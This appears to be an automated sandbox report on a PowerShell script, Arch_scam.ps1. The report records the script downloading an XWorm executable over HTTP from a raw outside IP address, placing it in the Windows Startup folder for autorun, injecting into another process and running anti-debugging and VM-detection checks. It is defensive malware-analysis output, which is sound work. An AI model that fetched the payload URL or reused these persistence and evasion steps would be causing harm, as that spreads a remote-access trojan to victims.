Data received	¬ç\|Ô'ÖèÉ©R¸Tþº`6TQLçH_ÚT¨Ìîð×¼È ÀçÜØÁ9(Tnº vpôÊsñÕ^ØÓ± ®vi¨¬>´ ,î×B <Ô:LLDá Ð\TºTÀ)º¤êôY´çúÜÌÂ¾ÔAÞÕKÜAÌÚºì¢¬YåôÝÒAÕ¸ðlöÔÔ,Ì`Â1¾h)pÞ/Á¡zB çJÜ¬VÔZPÙy òqÞ(\|L2tìÄL\ÙQôIÒAA¸¹â¤×ê¼¼ò¼úáÂÐTÊºÒÜY¤ôýÒ¬I[óAÌºB¡£±Z Rö³¹õ÷îÉØ¼öÁ¡ð¶ø Ítß-s»aY0iòÌw«9àª}ãÔ¬¡âöAÉ¸WìÆLi÷³-Ùt¾5l=À3«MÔºÙPÞ ]LUáÐTãº¥£\ùÌÞ&jL,bá4ÐzT<ºrYS ôKÒAC¸»à¦×è¼¾ð ¶çøÜÎÂ¾ÖÞòÞ¦êL¬âá´ÐúT¼ºòYÓôËÅzÃ.ÌbÂ3¾j+rò#ÞzL@áHÐTPºX&Y.ôwÒ6Ao¸>gJ×¼B ZçÜR»âÂ³¾ê«òò£ÞúLÀáÈÐTÐºØ¦Yÿ®ô÷Ò¶Aï¸¾çÊ×¼Â ÚçÜÒ;ÚLl"átÐ:T\|º2DBYJôÒRA¸Z{ f×(¼~0 vç8ÜN_ÂW¾OòGÞæªLì¢áôÐºTüº²ÄÂYÊôÒÒA¸Úû æ×¨¼þ° öç¸ÜÎßÂ×¸·×Á±ÔÖÜTÙ;bÌl "çtÜ:#zÂ¾BJòÞRLXná ÐfT(»À¸ÿ¦Å×Í¼¾^ ÙC¸¶þ³¯Ù©·Y«±ºÌü²áÄÐTÌºªÑ)Ì÷»¦Ùÿ¾®÷¶òïÞ¾òLÊáÐÂTºÚY;\|l "çtÜ:#zÂ¾BJÀNºWZä$jL,bá4ÐzT<ºrYS ôKÒAC¸»à¦×è¼¾ð ¶çøÜÎÂ¼!¡Óe(ãû³¢òÌ¬Üâë²Âã¾ºÛòÓÞÞL(T.À¸b3h>×p¼6x ç@ÜVÂ¾^&òÞ.bL4zá<ÐrTºJ YKôCÒA»¸â³è¾×ð¼¶ø çÀÜÖÂ¾Þ¦òÿÞ®âL´úá¼ÐòTºÊYËôÃÒX;çlÜ"+rÂ#¾zBòÞJLPáXÐnT ºf(6Yo>ôgÒA_¸WZ×¼Rä ªçìÜ¢«òÂ£¾úÂòÞÊLÐáØÐîT ºæ¨¶Yï¾ôçÒAß¸×Ú×¼ÒdØ?nò7Þv:L\|2áDÐ TLºå»ØÅ×¼æ§ ÕºeÁcÐ%Thº=øs]ÉÎ1TEòÞMLWá_ÐT'ºi/)Yh1ô`ÚÆ/°µÌ¹^ç_Çº½@ËS¸©Ø¥«õÜßs]ÁÍFZ/4`V±³£î·Ã\â!^.¶ê\|éØÑàrîPø«JÕ2kÏaÖÁ!Ðf×ÙÀÍÞz55è}ET Ø÷p%¢Y8jäÓY¬]}ñ§ºÌÇv¬¶ÖFï= ¼á²êÛÕ=ÒwrË¤¬««â¸ òeÌ-ÐÃp<ú\Ò3ÂðÐpDÃ ì©ÐTÕ°ðÕË¾;gÞÑò¦ìæÈ=¢¸Y#ü{Ð.S¤£äñ ûêÄH°iÍ+vINÿÌ³Òòå¹XñÞð»5¯¾á¬tÛ¤Í¯(NÑJØ{µÌU~È2Ëpa§(©³£çµê¤Vt\ÖZd³ÔâpLcxèÆ`ìð/{bÇ /ÆÑ¦DiOiÈ<¯¹?)AÆ§~Öªwý~º¨jÔÒø®P»9ÌU<· Ú"À»EP¶Ê´\|MùÔ:yÐÐtæº\MR`ÇÀTºôÓÒ.öÉ&ý·é¾ÕÜèÛþ²üÂby×» ¢§×±òP9éu7Þúì&?Q.oká}ëm¾AÀÄÄþjÁW¤õîUæ·ïçØ»ÌbwNåÅu«^§]Í¶æÄÒpCì¦ÕÇjÈ¹h8[@:¤ÃB·qN@ð¤U»§awr»õÔM{¯PÓ;x ¹ê Ë¥Î¾êÛìnób#QeF¿É¤ÌÄrº\|c¹²3RI9}±ÁÂ÷YßªyYÿÃå+E¦<¤±ìw½à~¹ä¹äß2©"±:¤ûUêÊ?æJ<âb´`z=°`{=¼`\|=¸`}=PßÉ©}õÂ«¾÷èÄ\|Ñ®øÖTKÅr ¶¡;÷¶6·XÉèKó§§'òºýÊ×Wî¬ Ç@¾¡Å¬¦»³èL}¹ÌØ[rÔ¿1ÊûbÝ°y)îÚKûbÞ°Äð£-#L®m~DÎÙXÊÈIUáâ »õ¸Ù±ñ§DÚÏL=ÈtØtà0=ÛèXñkÐÍç¸x(îz8Ø¶Ä¿Ø¹7y!ç¼Å±h¡°Õ`Q3ë´Áa¡\|ìy½Ãß±¨XÏr®Ï\|±ÊJãÞPl=¥Ø\|¥'¶í)ÝmÔ¶äTdØbäAéõt[ÍºÑ:´ýÓEàÓõ¥Üm.5eµùû~\wäÌ¹ÚùÎÐÍÎÑ×µñý°É2IåÁk1,µiÇÒÌñRÐG`Noºd×Ö³°tÐmí3äý½åÅiX.¦J~ÚçÐº[Aø§Âf/þæÀhÐäÝ$iåÅî¢Eë6èÝÕJ<=Ñ¸ÏÂ#oTª£:¶IyèÖ{e+DÊnËYËfê¯çêÙ[©Å(JþÅÖu¶ÅÊ°UîÓ@4pàúé=ðMù%QBkäËÕ\|qÌ{lÎq_@e+h)QqõüæÊ-B.µS>Ç9w7L´ßéüJfNìëûÝbÃ£&á ø¥ÁÒñíf5!È !=¬ Fc\q»Ó:OÏ9s"tc£rcÎVª6ì¿5yòÂB7`=XDbÓ>q¶ÿ®}Ïô:Çòl;íµÁc2!«`Lª×F]9DWM4åQis¯¯ÂGíö]Ógå8be ^pz$®ói]ð¸¿²í}=?Y(ùegLójjËÁ»²ÝWnÍÊú·4? < ¡×Gïô´ÄkïùÚ¬øêTã¢*2Â ¿R6Ø5ØáOyÓ¬åÁÐ§õ04(ÇêÅ¦Í&¥°ó19àm(tïXì S_~ëÀMxz]9¡ôV¤bSR}¨5 Xà¥ÁÎ+²P7@ê¶Æ?Ð^XÓe7Ð0âH¨Âü¨©Ð¤:Y××XÁ]ªõ ²ã¾ÅàéÏ»tÝ¦ûõ¼;pÒÊ³º íÑ3luþí!êÊ¯ìJÐGÐÂ

Poweshell is sending data to a remote host (1 event)

Data sent

GET /Archevod_XWorm.exe HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 18, 2023, 7:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	Select * from Win32_ComputerSystem

Communicates with host for which no DNS query was performed (1 event)

host

44.203.122.41

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWDEBUG
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (1 event)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Sept. 18, 2023, 7:44 a.m.	class_name: OLLYDBG window_name:		0	0

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Sept. 18, 2023, 7:44 a.m.	buffer: GET /Archevod_XWorm.exe HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive socket: 1632 sent: 81	1	81	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
parent_process	powershell.exe	martian_process	c:\Users\test22\Music\AnyDesk.exe
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe"

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (3 events)

Time & API	Arguments	Status	Return
CryptHashData Sept. 18, 2023, 7:44 a.m.	buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x009c3690 flags: 0	1	1
CryptHashData Sept. 18, 2023, 7:44 a.m.	buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x009c3690 flags: 0	1	1
CryptHashData Sept. 18, 2023, 7:44 a.m.	buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x009c3690 flags: 0	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1492 resumed a thread in remote process 2292
NtResumeThread Sept. 18, 2023, 7:44 a.m.	thread_handle: 0x00000778 suspend_count: 1 process_identifier: 2292	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 18, 2023, 7:44 a.m.	stacktrace: archevod_xworm+0x193083 @ 0x313083 archevod_xworm+0x19657d @ 0x31657d archevod_xworm+0x27b1cd @ 0x3fb1cd exception.instruction_r: ed 68 24 87 79 43 e9 14 9d ff ff d5 8c 72 5c 97 exception.symbol: archevod_xworm+0x187721 exception.instruction: in eax, dx exception.module: Archevod_XWorm.exe exception.exception_code: 0xc0000096 exception.offset: 1603361 exception.address: 0x307721 registers.esp: 6748848 registers.edi: 2970096 registers.eax: 1447909480 registers.ebp: 6748876 registers.edx: 22104 registers.ebx: 0 registers.esi: 2950532 registers.ecx: 10	1	0	0

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe

Arch_scam.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All